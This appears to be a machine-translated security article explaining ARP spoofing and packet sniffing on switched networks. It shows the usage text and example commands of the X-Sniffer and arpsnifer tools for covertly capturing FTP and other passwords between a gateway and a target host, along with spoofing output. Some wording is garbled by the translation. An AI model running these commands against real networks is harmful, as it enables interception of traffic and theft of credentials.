Network sniffing Sniffer instance analysis

 
We have already mentioned the principle above. Let's look at it again. Here, c also wants to sniff the communication between a and B. Therefore, c sends a false response packet to both a and B, tell a ----- B the mac address is: 0c: 0c: 0c: 0c: 0c: 0c (this is actually c), and tell B ------ a mac address is: 0c: 0c: 0c: 0c: 0c: 0c. After receiving a false arp packet, a knows that the packet sent to 192.168.0.2 should be sent to the mac address 0c: 0c: 0c: 0c: 0c: 0c; B also believes that, packets sent to 192.168.0.1 should be sent to machines with the mac address 0c: 0c: 0c: 0c: 0c: 0c: 0c. Both A and B add them to the arp cache table, which forms an intermediate forwarding process. However, the arp cache table is dynamically updated. Generally, no new information is updated in two minutes, and the arp cache table is automatically removed, therefore, c keeps sending such a false arp response packet to a and B, so that the arp cache table keeps storing the wrong ing table.

We can extend the above example to an exchange environment in the data room. We know that the data in the exchange environment must be in and out of the gateway, so in the above example, host a is changed to the gateway, hackers are deceiving the communication between the target host and the gateway. When this arp error ing table persists, the data packets from the gateway to the target host and the data packets from the target host must pass through the server that initiates the spoofing. The sniffing tool is described above, hackers use a packet capture tool on the spoofed server (usually the compromised server) to filter sensitive data, such as the ftp user name and password and pop password, web Password, Database Password, etc. These are usually completed by the software, and the software is very small, that is, running under dos, to avoid being discovered. Here, let's take a look at the common packet capture tools used by hackers:

Microsoft Windows [version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.

D:> sniff

X-Sniffer v1.0-simple sniffer for win2000

Code by glacier <glacier@xfocus.org>

Http://www.xfocus.org

 

USAGE: xsniff <Options>

<Options> means:

-Tcp: Output tcp packets

-Udp: Output udp packets

-Icmp: Output icmp Packets

-Pass: Filter username/password

-Hide: Run in background

-Host: Resolve IP address to hostname

-Addr <IP>: Output Packets when IP address equal to <IP>

-Port <Port>: Output Packets when port equal to <Port>

-Log <File>: Output to <File>

-Asc: Decode Packets to ASCII

-Hex: Decode Packets to HEX

Example:

Xsiff.exe-pass-hide-log pass. log

Xsiff.exe-tcp-udp-asc-addr 192.168.1.1

 

D:>

This is a tool used to capture packets in the lower-end docker. You can use sniff.exe-pass-hide-port 21-log pass. log to capture the pass packets on port 21 of the local host and save them in pass. log.

 

It is an arp spoofing tool outside China. It can cheat all machines under the same switch in a data center at the same time. In order to test in the data center, the damage is obvious. Of course, we have seen two separate software for packet capture spoofing. The LIU Guang author Xiao Rong wrote a software that perfectly combines arp Spoofing with packet capture, let's take a look at this software.

C: WINDOWSsystem32sniff> arpsnifer

Arpsnifer 0.5 (Router Inside), by netXeyes, Special Thanks BB

Www.netXeyes.com 2002, security@vip.sina.com

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

Of course, this software must first install the wincap driver. We look at the above parameters. ip1 is the gateway ip address, ip2 is the spoofing ip address, sniffer tcp port is the sniffing port, and logfile is the log file, netadp is the network card number and/ereset is optional. Let's take a look at the gateway ip address first.

C: WINDOWSsystem32sniff> ipconfig

Windows IP Configuration

Ethernet adapter local connection:

Connection-specific DNS Suffix .:

IP Address ......: 61. xxx. xxx.79

Subnet Mask ......: 255.255.255.0

Default Gateway ......: 61. xxx. xxx.254

C: WINDOWSsystem32sniff>

If the ip address to be spoofed is 61. xxx. xxx.78, The arpsnifer format is:

C:> arpsnifer 61. xxx. xxx.254 61. xxx. xxx.78 21 1.txt/reset
Arpsnifer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel (R) 8255x Based Network Connection
Enable IP Router... OK
Get 61. xxx. xxx.254 Hardware Address: 00-00-0c-07-ac-02
Get 61. xxx. xxx.78 Hardware Address: 00-b0-d0-22-10-cb
Get 61. xxx. xxx.79 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61. xxx. xxx.78: Mac of 61. xxx. xxx.78 ==> Mac of 61.139.1.79
Spoof 61. xxx. xxx.254: Mac of 61. xxx. xxx.254 ==> Mac of 61.139.1.79
Begin Sniffer .........

 

Token is the contents of the captured passpacket pass.txt. We can see that there are a lot of ftp usernames and passwords, which are for the account and password of the website space, and there is no security for a website. Packets from the attacked server must pass through the machine controlled by the hacker when they come in from the gateway. The hacker can capture packets through the sniffer to obtain the desired sensitive information on the target machine, therefore, attackers can intrude into the target machine by using the obtained password. This is the whole process of arp spoofing attacks that are currently popular by hackers. At the end of this article, we will not describe session hijacking and ip spoofing. The prevention of such attacks is described in the "ip bypass" column.